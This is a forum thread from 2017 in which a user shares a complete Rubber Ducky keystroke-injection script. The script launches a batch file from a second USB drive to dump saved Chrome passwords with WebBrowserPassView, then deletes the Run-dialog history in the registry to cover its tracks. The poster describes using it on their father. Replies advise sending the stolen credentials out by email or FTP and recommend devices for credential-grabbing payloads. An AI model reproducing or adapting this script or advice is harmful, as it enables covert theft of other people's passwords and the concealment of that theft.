Ahmadalame313 Posted August 26, 2017 Share Posted August 26, 2017 hey, I just got my first rubber ducky today and i already ran my first payload on my dad ( he was like *.*) . so before executing, i downloaded WebBrowserPassView version 1.45 where the program would run and create a .txt file where all the chrome passwords are saved in and put it on a usb that i bought. this usb is very small(maybe the the size of my nail) and i plugged it minutes before my ducky, after plugging the usb i saw that the usb was recognized as drive F: so at this moment i wrote my script REM open cmd DELAY 1000 GUI R DELAY 200 STRING cmd DELAY 150 ENTER REM resize cmd DELAY 200 STRING MODE CON: COLS=15 LINES=1 DELAY 10 ENTER REM access the F: drive STRING F: ENTER REM launch the bat file DELAY 200 STRING LAUNCH.BAT ENTER DELAY 300 REM clear my tracks STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue DELAY 100 ENTER DELAY 500 REM exit cmd STRING EXIT DELAY 10 ENTER After that i remove the ducky and wait for the appropriate time to remove the usb and plug it in another computer and get the password.txt So my question is, is there a way to access those files without using another usb(i heard about the twin ducky, i might try it, but im open for other suggesions) thanks!! Quote Link to comment Share on other sites More sharing options...
Rainman_34 Posted August 26, 2017 Share Posted August 26, 2017 You can also e-mail them to yourself or exfiltrate them over ftp Quote Link to comment Share on other sites More sharing options...
Ahmadalame313 Posted August 26, 2017 Author Share Posted August 26, 2017 Just now, Rainman_34 said: You can also e-mail them to yourself or exfiltrate them over ftp i could email the results but how can i out the webbrowserpassview files on the target pc from the first place, and how can i ftp them from a server to the targets computer? thanks 1 Quote Link to comment Share on other sites More sharing options...
Rainman_34 Posted August 26, 2017 Share Posted August 26, 2017 you would have to save the results to a .txt file on the computer first and then export them that way. Check out ducktoolkit.com. You can check some things you want done and it will show you the coding and take the ideas from that. Quote Link to comment Share on other sites More sharing options...
Ahmadalame313 Posted August 26, 2017 Author Share Posted August 26, 2017 1 minute ago, Rainman_34 said: you would have to save the results to a .txt file on the computer first and then export them that way. Check out ducktoolkit.com. You can check some things you want done and it will show you the coding and take the ideas from that. Thanks for taking the time to read and reply! Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted August 30, 2017 Share Posted August 30, 2017 You could make your own Ducky with a Pi Zero W (bit more DIY than out-of-the-box) or you can buy a Bash Bunny which has on-board support for ethernet, Ducky and storage attacks. There are many cred-grabbing payloads available for the BB. Those are the simplest ways if you're looking for a 1-USB-does-all solution. Might not be the cheapest ways though. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.